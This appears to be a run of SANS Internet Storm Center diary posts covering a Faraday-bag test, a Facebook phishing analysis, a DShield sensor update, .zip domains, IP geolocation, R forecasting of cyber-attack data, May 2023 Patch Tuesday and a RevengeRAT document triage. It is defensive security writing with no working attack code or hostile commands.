Credit Card	Credit card placed into bag Bag closed and sealed Flipper Zero placed on top of bag over card location Flipper Zero used to read NFC data
Bluetooth	iPhone connected to iPods via Bluetooth iPhone playing audio content iPhone placed into bag Listened for audio disruptions
WiFi (802.11)	Android phone with hotspot turned on Windows device connected to hotspot Continuous ping set to %%ip:8.8.8.8%% Android phone placed into bag Ping reviewed for disruptions
Cellular	iPhone placed into bag Android phone used to call iPhone

The results for these different tests were pretty quick. For the Flipper Zero tests, either the data could be read or it couldn't. For bluetooth and wifi, it was just waiting to see how the signal changed. Now for the results:

Scenario	Result
HID proximity card	Fail (Flipper Zero was able to read the data)
HID proximity fob	Fail (Flipper Zero was able to read the data)
Credit Card	Success (Flipper Zero was unable to read the data)
Bluetooth	Limited Success (Audio signal cut in and out, heavily impacted by proper sealing of the bag)
WiFi (802.11)	Success (Wireless network was quickly disconnected and unable to be seen from mobile hotspot feature)
Cellular	Success (iPhone was unable to receive phone call, Android phone was directed straight to voicemail)

From the testing, there were a few takeaways:

• Test to make sure your protections are effective
• Make sure to follow instructions - Bluetooth audio was very functional with a partially closed bag
• When in doubt, turn off features, or devices, if not needed and when in a space of uncertain safety

For some of these attacks, someone would need very close proximity to complete a successful attack. In the case of testing using the Flipper Zero, the reader was physically sitting on top of the bag and that would be much more challenging for someone to do in a real world situation.

[1] https://www.zdnet.com/article/do-rfid-blocking-cards-actually-work-my-flipper-zero-revealed-the-truth/
[2] https://www.amazon.com/dp/B0BHSH8BLR?ref=ppx_yo2ov_dt_b_product_details&th=1
[3] https://flipperzero.one/
[4] https://docs.flipperzero.one/rfid
[5] https://docs.flipperzero.one/nfc

--
Jesse La Grew
Handler

At the Internet Storm Center, we often receive examples of current malspam and phishing e-mails from our readers. Most of them are fairly uninteresting, but some turn out to be notable for one reason or another. This was the case with several messages that Charlie, one of our readers, has submitted to us since the beginning of 2023.

At first glance, the messages appear to be fairly straightforward Facebook phishing e-mails. The HTML body of each message appears to always be the same – it states that a user just logged into the recipient’s Facebook account from a new device and requests that the recipient verifies whether the login was legitimate.

The overall layout of the message seems to mirror legitimate e-mails from Facebook (actually, it seems clear that the author of the phishing message began its development by copying a legitimate message and modifying it, but we’ll get to that later).

The first aspect of the messages that turned out to be unusual was the From field in their e-mail headers, which didn’t contain a valid e-mail address but only a string "Facebook" <>.

Although this string does not adhere to the requirements on e-mail header From fields set forth in the RFC 5322[1] (nor the older RFC 2822[2]), the corresponding e-mail was successfully delivered to Charlie’s Hotmail mailbox.

It would therefore seem that at least some e-mail servers out there will accept messages with From header field set in an “RFC-non-compliant” fashion… However, it should be noted that – as you may see in the image above – the Reply-To filed was set correctly in the e-mail header, which may be the reason why Hotmail decided to deliver the message(s).

In any case, the missing e-mail address in the From field resulted in the message being displayed in such a way that the recipient couldn’t easily check the address of the sender, which has certainly made the message appear more trustworthy than if an obviously incorrect sender address was displayed.

Another interesting aspect of the messages was that, except for the link from the Facebook logo and the “Learn more” link, all other href targets were set to the following string.

mailto:<[email_address]>?subject=[string]

This meant that if a recipient were to click on the links, a new e-mail message would be opened in the e-mail client the recipient would be using with the To field set to the e-mail address determined by the author of the phishing message and the Subject field set to either the string:

send+statement [recipient e-mail]

or

yes+me [recipient e-mail]

depending on which “button” the recipient would press.

It should be mentioned that the “unsubscribe” link also pointed to a “mailto” target, however, unlike the “buttons”, it wouldn’t correctly set the Subject field for the new e-mail, since the relevant string was malformed in the following way:

mailto:<[email_address]>?=bject=unsubscribe+me!

Phishing e-mails which request that a victim responds by sending a message back to their senders (or even those that open a new message window using the “mailto:” href target) have been with us for a long time, so the aforementioned approach isn’t new. Nevertheless, in this case, use of the technique is noteworthy, since the layout of the e-mail would lead one to expect that the “buttons” would cause a web page to be displayed in a browser, rather opening a new e-mail message. This behavior, on its own, might have been enough to confuse some of the less technical recipients and might have led to an increased “success rate” of the phishing. It is also a good example of why it is advisable to discuss the dangers of “mailto:” links in e-mails and on websites in security awareness courses

The last reason why this message (or, rather, this set of messages) was interesting was that the HTML body seemed to be identical in all examples we’ve seen (7 different messages sent between January and May of this year), including the malformed string in the target of the “unsubscribe” link. The only visible difference between the messages was the use of different e-mail addresses in the “mailto” links.

As we have already mentioned, it is almost certain that the message was the result of a modification of a legitimate e-mail from Facebook. Besides the fact that the text and structure of the footer of the e-mail is identical to the one that was historically used by Facebook, another aspect of the message which would appear to confirm the assumption were the two links pointing to external URLs.

The “Learn more” link pointed to the same URL as it does in legitimate Facebook e-mails, i.e.:

https://www.facebook.com/email_forward_notice/?mid=[unique identifier]

However, what was more interesting was the link from the Facebook logo in the header of the message – it pointed to the following URL:

https://www.facebook.com/n/?[name_of_facebook_page]%2F&aref=[unique_identifier]&medium=email&mid=[unique_identifier]&n_m=[recipient_email_address]

A link with URL with this format is added to the Facebook logo in legitimate messages with “page suggestions” (and possibly others), which Facebook sends out to its users.

Since it is unlikely that an author of a phishing message template would choose to use this format (always with the same page name and "unique" identifiers) for any reason apart from copying it from an original Facebook e-mail, it would seem that the aforementioned assumption is, indeed, true.

In any case, as with almost the entire body of the message, the target URL in the link from the Facebook logo was the same in all the e-mails we have seen.

One last point which deserves mention is that while there was no visible difference between the messages in question, each of them included a unique tracking pixel at the end.

While it may seem strange that the same phishing message with the same, static URL in one of the hrefs and an RFC-non-compliant sender “address” could be used for a significant timespan without any modification, since one would hope that most e-mail services would be able to detect it as malicious and block it fairly quickly, the fact that the first message we received was from January 10th and the (so far) last one was received on May 8th goes to show that phishing messages might sometimes have a much longer lifespan than one would expect…

[1] https://www.rfc-editor.org/rfc/rfc5322
[2] https://www.rfc-editor.org/rfc/rfc2822

-----------
Jan Kopriva
@jk0pr
Nettles Consulting

This week I was reminded the web logs stored in DShield sensor were no longer using the correct location and configuration. If like me you installed your DShield sensor several months ago, it is important to regularly check our DShield-ISC Github [2] site to check for any update. Last month, some of the scripts were updated. You can update the sensor by following these steps.

Inside your "dshield" directory (the directory created above when you run git clone), run

• cd install/dshield
• sudo git pull
• sudo bin/install.sh --update

An important change in the lastest update is the weblog location and new naming convention:

Old Weblog Location - /srv/www/DB/webserver.sqlite
New Weblog Location - /srv/db/isc-agent.sqlite

DShield sensor Status and Configuration

Honeypot status: sudo /srv/dshield/status.sh
Honeypot configuration: sudo cat /etc/dshield.ini

[1] https://isc.sans.edu/tools/honeypot/
[2] https://github.com/DShield-ISC/dshield
[3] https://isc.sans.edu/diary/22680/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

About ten years ago, ICANN started the "gTLD" program. "Generic TLDs" allows various brands to register their own trademark as a TLD. Instead of "google.com", you now can have ".google"! Applying for a gTLD isn't cheap, and success isn't guaranteed. But since its inception, dozens of new gTLDs have been approved and started to be used [1].

The reputation of these new gTLDs has been somewhat mixed. On one end, several very cheap TLDs emerged from the process that are often abused. For example, .xyz or .top are often used for cheap "throw-away" domains. But we also had some large companies, for example, Google, use it (try: domains.google). Google submitted applications for several different gTLDs [2].

One of the more interesting gTLDs Google obtained is ".zip". This gTLD was approved in 2014, and has not seen much use since then. The current zone file for ".zip" contains only 1230 names. To access the zone files for many of the gTLDs, ICANN operates the "Centralized Zone Data Service" at czds.icann.org. 

So what is the danger here? 

Earlier I saw this tweet by @vxunderground

And indeed, the domain has been registered and appears functional. Whois states a creation date of today.

% dig NS officeupdate.zip +short
ns71.domaincontrol.com.
ns72.domaincontrol.com.

You may see how this could be a risk for your organization as it may lead to some interesting phishing sites. It offers some creative opportunities to distribute malware. Just to clarify: I consider @vxunderground "good guys." They distribute malware, but for good reasons (just ask them for the password ;-) ).

So I checked the current zone file from CZDS, and found some other interesting domains:

update.zip - May 5th 2023
installer.zip - May 10th 2023

I could not find any official announcement, but it looks like registrations for .zip started about a month ago. 

Another issue with the .zip gTLD is that software may now automatically attach hyperlinks to ZIP file names that show up in the text. The result could be that ZIP file names leak as DNS queries as you hover over them. I have not yet observed this behavior, but it may be possible as .zip domains become more well-known. Let me know if you see anything like this. This behavior has been problematic, not just for .zip domains.

Given the low "real world" usage of .zip domains, it may be best to block access to them until it is clear if it will be useful.

And if you would like to check the domains yourself, I created a quick snapshot of .zip domains with NS records attached to them. See https://isc.sans.edu/diaryimages/zipdomains.txt 

Update: I found the press release from Google announcing the availability of these new domains [3]. According to the press release, they started to become available on May 3rd, but the price dropped on May 10th, which explains the increased interest these last couple of days.

[1] https://newgtlds.icann.org/en/about/program
[2] https://icannwiki.org/Google#New_gTLDs
[3] https://blog.google/products/registry/8-new-top-level-domains-for-dads-grads-tech/

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

There are several resources available that assist in geolocating IP addresses. Commercial offerings like MaxMind (which also offers a free database) have a pretty good track record in locating a particular IP address. But still, there are several difficulties when it comes to IP address-based geolocation.

First, let's look at some of the options to geolocate a computer. There are two basic methods that can be used:

1 - Geolocation By IP Address

This is probably the simplest method as it does not require a "cooperating client" (more about that later). It may also be performed after the fact on log entries, which other methods do not allow. You will typically rely on geolocation databases. These databases can be reasonably accurate if the information ISP provide is accurate.

Common problem cases:

• Mobile phones: Mobile operators commonly use "Carrier Grade NAT (cgNAT)." The user's IP address may change very frequently, and the granularity of the information is limited by the design of the mobile operator's network. Many have multiple gateways that may correlate with certain geographic regions. Theoretically, the operator may use only one gateway globally.
• Sattelite connections: It should be obvious that for satellite connections, all bets are off as to the user's geographic location. For traditional satellite operators like ViaSat and Hughes, only a few satellites are used for all users globally, making geolocation impossible. For news large constellations, like Starlink, some regional information may be available. A particular satellite typically will cover a particular region of the globe and relay traffic to a base station close to the user. But this information is still not very granular. For Starlink, the hostname the IP resolves to includes the name of the "Point of Presence" (POP). For example, 98.97.178.235 is the IP address that was used for the hotel at our SANS event in Orlando this spring. It resolves to: customer.atlagax1.pop.starlinkisp.net, indicating that this connection may have used a POP in Atlanta, GA. Close, but still a different state. MaxMind also uses Atlanta, GA, as the location for this IP address.
• Datacenters/Cloud: Currently, data centers providing cloud services are experiencing rapid growth. As a result, operators of these data centers are sometimes getting creative when it comes to using IP addresses. They may move IP addresses between data centers as needed, which may not always be reflected in respective databases.
• VPNs: For VPN users, you will get the IP address of the VPN exit. Sometimes, you may be able to identify the VPN, but this is hit-or-miss. Most commercial VPNs use servers in datacenters. A user using a desktop browser but originating from a datacenter/cloud IP address is likely using a VPN.

To look up the location of an IP address without using a commercial database, "whois" is often used to identify the ISP owning the address. For example, let's pick 70.91.122.90. This IP address was issued to ARIN, which handed Comcast the 70.88.0.0/14 block. Comcast has, in the past, provided more detailed data, but I have not seen this anymore recently.

Your next step should be reverse resolving the IP address. Many ISPs, as you saw for Starlink above, will offer additional details as part of the hostname.

I do like to follow this up with a traceroute. A traceroute will sometimes show the hostnames of routers, which may again include indicators of their location. But this can sometimes be ambiguous.

Let's consider this IP address: 77.35.134.111:

• reverse resolution fails.
• Whois indicates that it is owned by Rosstelecom (Russia) and assigned to "Dynamic Broadband Clients."
• Traceroute: US -> Germany -> Russia. But the traceroute "Peeters out" and the last router has a very high latency (around 300 ms). The address responds to ping with a latency of around 300ms.
• Rostelecom has a looking-glass server: http://lg.ip.rt.ru/ . No real help from it (maybe someone else can get some details from it?)
• MaxMind puts it into Vladivostok, RU. That sort of matches the latency and all.
• Shodan shows the IP address has port 5060 open (SIP), consistent with a broadband modem that also provides VoIP service.

So we have a reasonable case for the address being located in Vladivostok. Or could it be located a few miles further south in North Korea? To double-check, we would have to compare to other Vladivostok IPs to see if they have similar latencies.

2 - Operating System APIs

Most desktop operating systems include geolocation APIs. They may use local WiFi networks, built-in GPS receivers, or for mobile phones, local cell phone towers to determine their location. You will only be able to use this feature while the user is connected to you, and the user will have to allow access to the API. Of course, the user may send whatever location they wish to. But with a collaborating client, this can be very accurate. It works great for mapping. This is one reason why Google recently started using "google.com/maps" for its "Google Maps." Users will gladly give Google Maps access to their location. After all, the map needs to know where you are to give directions. But by using "google.com/maps" instead of "maps.google.com," all "google.com" properties now have access to the user's location after the user gave access to the location on google.com/maps.

Summary

Accurate geolocation is hard without a collaborating user. With many users using mobile devices, VPNs, or even satellite connections, IP addresses are becoming a less reliable source of geolocation information. You should probably not rely on geolocation for security-relevant decisions. Disabling access to your site from certain locations can help "keep the noise down" but is easily bypassed. 

Let me know if you encountered any "tricky" IP addresses where you had difficulty geolocating them.

Also, here is a link to a "funny" story about what happens if people rely on geolocation data:
https://arstechnica.com/tech-policy/2016/08/kansas-couple-sues-ip-mapping-firm-for-turning-their-life-into-a-digital-hell/

 

 

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Part 2 of 2

Part 1

Introduction

In part 2 of our exploratory data analysis (EDA), a mission critical task underpinning the predominance of detection development and preparation for cybersecurity-centric machine learning, a remimder that there are a number of actions that analysts can take to better understand a particular data set and ready it for more robust utilization. That includes forecasting, which we will perform, again using the University of Maryland’s Center for International and Security Studies (CISSM) Cyber Attacks Database, an ideal candidate for experimental exploration. Per the dataset description, the database “brings together open-source information surrounding a range of publicly acknowledged cyber events on private and public organizations. Events from 2014 through present have been coded to standardize information on threat actor, threat actor country, motive, target, end effects, industry, and country of impact. Source links to the news source are also provided” (Harry & Gallagher, 2018).

We continue this exploratory data analytics journey with forecasting models and plots to show how you might predict future attack volumes.

Models

Next, we model the CISSM CAD data for time series forecasting with three well known methods selected for performance with the CISSM CAD dataset. These include naive, SES, and ARIMA.
Naive forecasting uses the most recent observation as the forecast for the next observation.
Simple exponential smoothing (SES) is the method of time series forecasting used with univariate data with no trend and no seasonal pattern.
Autoregressive integrated moving average, or ARIMA, is a statistical analysis model that uses time series data to either better understand the data set or to predict future trends.
Before we initiate the forecasts we use each of the methods to determine which one performs best. For brevity here, we’ll only run the models and plots on exploitative data, but the forecasts_CISSM.R script and the Jupyter/Colab notebook in the GitHub repo run all models and plots with disruptive and exploitative data. Note again that these are subsets of a much broader dataset represented by CISSM CAD. Explore further to your liking.
Important to the modeling that follows, note the evaluation metrics RMSE and MAE. Root Mean Squared Error (RMSE) and Mean Absolute Error (MAE) are used to evaluate regression models, tell us how accurate our predictions are, and the amount of deviation from actual values (Acharya, 2021). In essence, the lower the score, the better the performance.

> naive_model_exploitative <- naive(exploitative, h = 12) 
> summary(naive_model_exploitative)

Forecast method: Naive method

Model Information:
Call: naive(y = exploitative, h = 12) 

Residual sd: 20.5334 

Error measures:
                      ME    RMSE      MAE  MPE MAPE      MASE       ACF1
Training set -0.06481481 20.5334 15.41667 -Inf  Inf 0.6228308 -0.3349566

Forecasts:
         Point Forecast      Lo 80     Hi 80      Lo 95     Hi 95
Feb 2023             23  -3.314606  49.31461  -17.24472  63.24472
Mar 2023             23 -14.214473  60.21447  -33.91463  79.91463
Apr 2023             23 -22.578235  68.57824  -46.70590  92.70590
May 2023             23 -29.629213  75.62921  -57.48944 103.48944
Jun 2023             23 -35.841249  81.84125  -66.98992 112.98992
Jul 2023             23 -41.457358  87.45736  -75.57902 121.57902
#snipped

The naive model yields an RMSE score of 20.5 and an MAE score 15.4.

> ses_model_exploitative <- ses(exploitative$Exploitative, h = 12) # RMSE = 18.8, MAE = 13.9
> summary(ses_model_exploitative)

Forecast method: Simple exponential smoothing

Model Information:
Simple exponential smoothing 

Call:
 ses(y = exploitative$Exploitative, h = 12) 

  Smoothing parameters:
    alpha = 0.529 

  Initial states:
    l = 32.3171 

  sigma:  19.0189

     AIC     AICc      BIC 
1157.442 1157.671 1165.517 

Error measures:
                    ME     RMSE      MAE  MPE MAPE      MASE       ACF1
Training set 0.2068036 18.84358 13.92841 -Inf  Inf 0.9034647 0.03522811

Forecasts:
    Point Forecast      Lo 80    Hi 80      Lo 95     Hi 95
110       44.24184 19.8681717 68.61551   6.965531  81.51815
111       44.24184 16.6677635 71.81592   2.070929  86.41275
112       44.24184 13.8020028 74.68168  -2.311874  90.79555
113       44.24184 11.1837445 77.29994  -6.316154  94.79983
114       44.24184  8.7581582 79.72552 -10.025768  98.50945
115       44.24184  6.4880896 81.99559 -13.497539 101.98122
#snipped

The SES model yields an RMSE score of 18.8 and an MAE score of 13.9.

> arima_model_exploitative <- auto.arima(exploitative) 
> summary(arima_model_exploitative)
Series: exploitative 
ARIMA(2,1,1) 

Coefficients:
         ar1     ar2      ma1
      0.4744  0.1671  -0.9653
s.e.  0.1021  0.1007   0.0323

sigma^2 = 343.6:  log likelihood = -467.68
AIC=943.35   AICc=943.74   BIC=954.08

Training set error measures:
                   ME     RMSE     MAE  MPE MAPE      MASE        ACF1
Training set 2.152378 18.19375 13.5603 -Inf  Inf 0.5478338 -0.01933472

Finally, the ARIMA model yields an RMSE score of 18.2 and an MAE score of 13.6. Ultimately, by a small margin, the ARIMA model is most likely to provide the best forecast. Next, we forecast and plot the results. Given that ARIMA is most reliable under these circumstances, we’ll focus on visualizing ARIMA results; you can experiment with naive and SES plots on your own via the scripts or the notebook.

Forecasts & Plots

Generating a plot of AllEvents is as easy as:

autoplot(as.ts(AllEvents))

Figure 6: CISSM CAD AllEvents plot

This is just as easy with disruptive or exploitative events exclusively with the likes of autoplot(as.ts(disruptive)) or autoplot(as.ts(exploitative)).

To forecast the exploitative ARIMA model in an individual plot, utilize:

forecast(arima_model_exploitative) %>% autoplot()

Figure 7: CISSM CAD exploitative events forecast plot

The light and dark areas correspond to the 95% and 80% confidence intervals (CI) respectively.
You can join multiple plots to compare outcomes side by side as follows.

naiveEXP = forecast(naive_model_exploitative) %>% autoplot()
sesEXP = forecast(ses_model_exploitative) %>% autoplot()
arimaEXP = forecast(arima_model_exploitative) %>% autoplot()

multi.pageEXP <- ggarrange(naiveEXP, sesEXP, arimaEXP, nrow = 3, ncol = 1)
multi.pageEXP

Figure 8: CISSM CAD exploitative events multi-model forecast plot

You may be wondering what ARIMA(2,1,1) refers to in our plots. A nonseasonal ARIMA model, which this is, is classified as an “ARIMA(p,d,q)” model, where: p is the number of autoregressive terms, d is the number of nonseasonal differences needed for stationarity, and q is the number of lagged forecast errors in the prediction equation. Therefore, in this case, (2,1,1) is p,d,q found by the auto.arima process indicating that we have two auto-regessive terms, one difference, and one moving average term in our series (Nau, 2020).

Conclusion

Hopefully, this effort has been useful and insightful for security analysts as well as fledgling data scientists in the security realm. It’s no surprise that I orient towards the practices of visualization; I have found all methods deployed here to be useful, effective, and durable for future use. It is my desire that you benefit similarly, and that this opens some doors for you, literally and figuratively.

Cheers…until next time.

Russ McRee | @holisticinfosec | infosec.exchange/@holisticinfosec | LinkedIn.com/in/russmcree

This month we got patches for 49 vulnerabilities. Of these, 6 are critical, and 2 are already being exploited, according to Microsoft.

One of the exploited vulnerabilities is a Win32k Elevation of Privilege Vulnerability (CVE-2023-29336). This vulnerability has low attack complexity, low privilege, and none user interaction. The attack vector is local, the CVSS is 7.8, and the severity is Important.

The second exploited vulnerability is Secure Boot Security Feature Bypass Vulnerability (CVE-2023-24932). According to the advisory, to exploit the vulnerability, an attacker who has physical access or Administrative rights to a target device could install an affected boot policy. The CVSS for this vulnerability is 6.7 and its severity is Important.

About the critical vulnerabilities, there is a Remote Code Execution (RCE) affecting Windows Network File System (CVE-2023-24941). According to the advisory, this vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). The advisory also details a mitigation procedure. The CVSS for this vulnerability is 9.8 – the highest for this month.

A second critical vulnerability worth mentioning is an RCE affecting Windows Lightweight Directory Access Protocol (LDAP) (CVE-2023-28283). According to the advisory, an unauthenticated attacker who successfully exploited this vulnerability could gain code execution through a specially crafted set of LDAP calls to execute arbitrary code within the context of the LDAP service. The attack complexity is high, which means that successful exploitation of this vulnerability requires an attacker to win a race condition. The CVSS for this vulnerability is 8.1.

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com/

May 2023 Security Updates

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
AV1 Video Extension Remote Code Execution Vulnerability
%%cve:2023-29340%%	No	No	-	-	Important	7.8	6.8
%%cve:2023-29341%%	No	No	-	-	Important	7.8	6.8
Chromium: CVE-2023-2459 Inappropriate implementation in Prompts
%%cve:2023-2459%%	No	No	-	-	-
Chromium: CVE-2023-2460 Insufficient validation of untrusted input in Extensions
%%cve:2023-2460%%	No	No	-	-	-
Chromium: CVE-2023-2462 Inappropriate implementation in Prompts
%%cve:2023-2462%%	No	No	-	-	-
Chromium: CVE-2023-2463 Inappropriate implementation in Full Screen Mode
%%cve:2023-2463%%	No	No	-	-	-
Chromium: CVE-2023-2464 Inappropriate implementation in PictureInPicture
%%cve:2023-2464%%	No	No	-	-	-
Chromium: CVE-2023-2465 Inappropriate implementation in CORS
%%cve:2023-2465%%	No	No	-	-	-
Chromium: CVE-2023-2466 Inappropriate implementation in Prompts
%%cve:2023-2466%%	No	No	-	-	-
Chromium: CVE-2023-2467 Inappropriate implementation in Prompts
%%cve:2023-2467%%	No	No	-	-	-
Chromium: CVE-2023-2468 Inappropriate implementation in PictureInPicture
%%cve:2023-2468%%	No	No	-	-	-
Microsoft Access Denial of Service Vulnerability
%%cve:2023-29333%%	No	No	-	-	Important	3.3	2.9
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
%%cve:2023-29350%%	No	No	Less Likely	Less Likely	Important	7.5	6.5
Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability
%%cve:2023-29354%%	No	No	Less Likely	Less Likely	Moderate	4.7	4.1
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2023-24953%%	No	No	-	-	Important	7.8	6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2023-29344%%	No	No	-	-	Important	7.8	6.8
Microsoft Remote Desktop app for Windows Information Disclosure Vulnerability
%%cve:2023-28290%%	No	No	-	-	Important	5.3	4.6
Microsoft SharePoint Server Information Disclosure Vulnerability
%%cve:2023-24954%%	No	No	-	-	Important	6.5	5.7
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2023-24955%%	No	No	-	-	Critical	7.2	6.3
Microsoft SharePoint Server Spoofing Vulnerability
%%cve:2023-24950%%	No	No	-	-	Important	6.5	5.7
Microsoft Teams Information Disclosure Vulnerability
%%cve:2023-24881%%	No	No	-	-	Important	6.5	5.7
Microsoft Word Security Feature Bypass Vulnerability
%%cve:2023-29335%%	No	No	-	-	Important	7.5	6.5
Remote Desktop Client Remote Code Execution Vulnerability
%%cve:2023-24905%%	No	No	-	-	Important	7.8	6.8
Remote Procedure Call Runtime Denial of Service Vulnerability
%%cve:2023-24942%%	No	No	-	-	Important	7.5	6.5
Secure Boot Security Feature Bypass Vulnerability
%%cve:2023-24932%%	Yes	Yes	-	-	Important	6.7	6.2
Server for NFS Denial of Service Vulnerability
%%cve:2023-24939%%	No	No	-	-	Important	7.5	6.5
SysInternals Sysmon for Windows Elevation of Privilege Vulnerability
%%cve:2023-29343%%	No	No	-	-	Important	7.8	6.8
Visual Studio Code Information Disclosure Vulnerability
%%cve:2023-29338%%	No	No	-	-	Important	5.0	4.5
Win32k Elevation of Privilege Vulnerability
%%cve:2023-24902%%	No	No	-	-	Important	7.8	6.8
%%cve:2023-29336%%	No	Yes	-	-	Important	7.8	6.8
Windows Backup Service Elevation of Privilege Vulnerability
%%cve:2023-24946%%	No	No	-	-	Important	7.8	6.8
Windows Bluetooth Driver Elevation of Privilege Vulnerability
%%cve:2023-24948%%	No	No	-	-	Important	7.4	6.4
Windows Bluetooth Driver Information Disclosure Vulnerability
%%cve:2023-24944%%	No	No	-	-	Important	6.5	5.7
Windows Bluetooth Driver Remote Code Execution Vulnerability
%%cve:2023-24947%%	No	No	-	-	Important	8.8	7.7
Windows Driver Revocation List Security Feature Bypass Vulnerability
%%cve:2023-28251%%	No	No	-	-	Important	5.5	4.8
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2023-24899%%	No	No	-	-	Important	7.0	6.1
Windows Installer Elevation of Privilege Vulnerability
%%cve:2023-24904%%	No	No	-	-	Important	7.1	6.2
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2023-24949%%	No	No	-	-	Important	7.8	6.8
Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
%%cve:2023-28283%%	No	No	-	-	Critical	8.1	7.1
Windows MSHTML Platform Security Feature Bypass Vulnerability
%%cve:2023-29324%%	No	No	-	-	Important	6.5	5.7
Windows NFS Portmapper Information Disclosure Vulnerability
%%cve:2023-24901%%	No	No	-	-	Important	7.5	6.5
Windows NTLM Security Support Provider Information Disclosure Vulnerability
%%cve:2023-24900%%	No	No	-	-	Important	5.9	5.2
Windows Network File System Remote Code Execution Vulnerability
%%cve:2023-24941%%	No	No	-	-	Critical	9.8	8.5
Windows OLE Remote Code Execution Vulnerability
%%cve:2023-29325%%	Yes	No	-	-	Critical	8.1	7.3
Windows Pragmatic General Multicast (PGM) Denial of Service Vulnerability
%%cve:2023-24940%%	No	No	-	-	Important	7.5	6.5
Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
%%cve:2023-24943%%	No	No	-	-	Critical	9.8	8.5
Windows SMB Denial of Service Vulnerability
%%cve:2023-24898%%	No	No	-	-	Important	7.5	6.5
Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
%%cve:2023-24903%%	No	No	-	-	Critical	8.1	7.1
Windows iSCSI Target Service Information Disclosure Vulnerability
%%cve:2023-24945%%	No	No	-	-	Important	5.5	4.8

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

Malicious documents like this RevengeRAT ppam file found on MalwareBazaar contain VBA code that you can analyze with oledump.py.

Some shortcuts can be used to try to save time doing a lengthy VBA code analysis,

One of them is looking for strings of encoded payloads, like BASE64.

But if you just run base64dump.py on this sample, you won't get results, because this is a ppam file, and thus a ZIP container: all data is compressed.

You can unzip all contained files, and then analyze them one-by-one with base64dump.py.

But there is a quicker method: let zipdump.py produce JSON output that contains the decompressed content of each file, and then let base64dump.py consume this JSON output.

The way to do this, is to use option --jsonoutput with zipdump.py, and --jsoninput with base64dump.py. Use option -e all to search for all possible encodings supported by base64dump.py (not just BASE64, but also hexadecimal, base85, netbios name encoding, ...), and I also threw in option -n 30 to select payloads at least 30 bytes long (just to keep all the output on a single screenshot):

There is a string, 808 characters long, that is a valid BASE64 string (b64) and also a valid BASE85 string (b85). The base64 decoded strings shows something familiar: I E X ...

And it's found in the vbaProject.bin file.

Next step is to take a look at this decoded data (-s L selects the largest decoding):

This looks like utf16: it can be decoded with -t utf16:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

Part 1 of 2

Introduction

Exploratory data analysis (EDA) is a mission critical task underpinning the predominance of detection development and preparation for cybersecurity-centric machine learning. There are a number of actions that analysts can take to better understand a particular data set and ready it for more robust utilization. In the spirit of toolsmith, consider what follows a collection of tools for your security data analytics tool kit.

The University of Maryland’s Center for International and Security Studies (CISSM) Cyber Attacks Database is an ideal candidate for experimental exploration. Per the dataset description, the database “brings together open-source information surrounding a range of publicly acknowledged cyber events on private and public organizations. Events from 2014 through present have been coded to standardize information on threat actor, threat actor country, motive, target, end effects, industry, and country of impact. Source links to the news source are also provided” (Harry & Gallagher, 2018). I asked the project’s principal investigators for data export access as the default UI content is not suited to raw ingestion. The resulting cissm-export.csv (through MAR 2023) file, and all of the code that follows, as well as a Jupyter/Colab notebook for convenient experimentation, are available to you via my CISSM-EDA repository.

We begin with with loading the necessary libraries, data ingestion, data frame construction (tibble), and tsibble creation, a time series tibble. Our series of experiments require correlationfunnel, devtools, forecast, fpp2, CGPfunctions, ggpubr, janitor, tidyverse, tsibble, TTR, and vtree. The following snippet installs packages only if needed. Note that we’re installing dataxray from my fork in order to take advantage of an update I made to the report_xray() function. This update enables the results of a dataxray report to render in a browser automatically, particularly useful when calling the function from a Jupyter/Colab notebook.

my_packages <- c("correlationfunnel", "devtools", "forecast", "fpp2", "CGPfunctions", 
"ggpubr", "janitor", "tidyverse", "tsibble", "TTR", "vtree")                            # Specify your packages
not_installed <- my_packages[!(my_packages %in% installed.packages()[ , "Package"])]    # Extract packages to be installed
if(length(not_installed)) install.packages(not_installed)                               # Install packages
devtools::install_github("holisticinfosec/dataxray")                                    # Install dataxray

With packages installed, we call libraries and build important components for our exercises. Comments are inline for each step.

# Attach the requisite packages

library(dataxray)
library(forecast)
library(fpp2)
library(CGPfunctions)
library(ggpubr)
library(janitor)
library(tidyverse)
library(tsibble)
library(TTR)
library(vtree)

# ingest the CISSM CAD data as a data frame

df <- read_csv("CISSM-export.csv", show_col_types = FALSE)

# shrink the data set to include only event dates and event types

evtType <- tabyl(df, evtDate, event_type)

# convert the reduced data frame to a tibble

df1 <- as_tibble(evtType)

# create an all events tsibble

df1 |>
  mutate(evtDate = yearmonth(evtDate)) |>
  as_tsibble(index = evtDate) -> AllEvents

# create disruptive events tsibble
AllEvents |> select(evtDate,Disruptive) -> disruptive

# create exploitative events tsibble
AllEvents |> select(evtDate,Exploitative) -> exploitative

The disruptive and exploitative variables will be used later as we model, forecast, and plot the results.
We’ll take advantage of the df variable for dataxray, janitor, CGPfunctions, and vtree.

dataxray

dataxray is an interactive table interface for data summaries. It provides an excellent, interactive first look at the data set. I set a specific working directory in my script, set yours as you see fit.

df %>%
  make_xray() %>%
  view_xray()

df %>%
  report_xray(data_name = 'CISSM', study = 'ggplot2')

The result is a columnar view of the CISSM Cyber Attacks Database with variables, observations including missing and distinct data, and interactive figures per variable. The view_xray() function creates an RStudio IDE Viewer pane while report_xray() generates the same result as RMD and HTML files written to your local directory. I’ve hosted the HTML version here if you’d like to interact with it without having to run the analyses yourself.

Figure 1: CISSM CAD dataxray

We learn quickly that the data include 10642 observations and 13 variables.
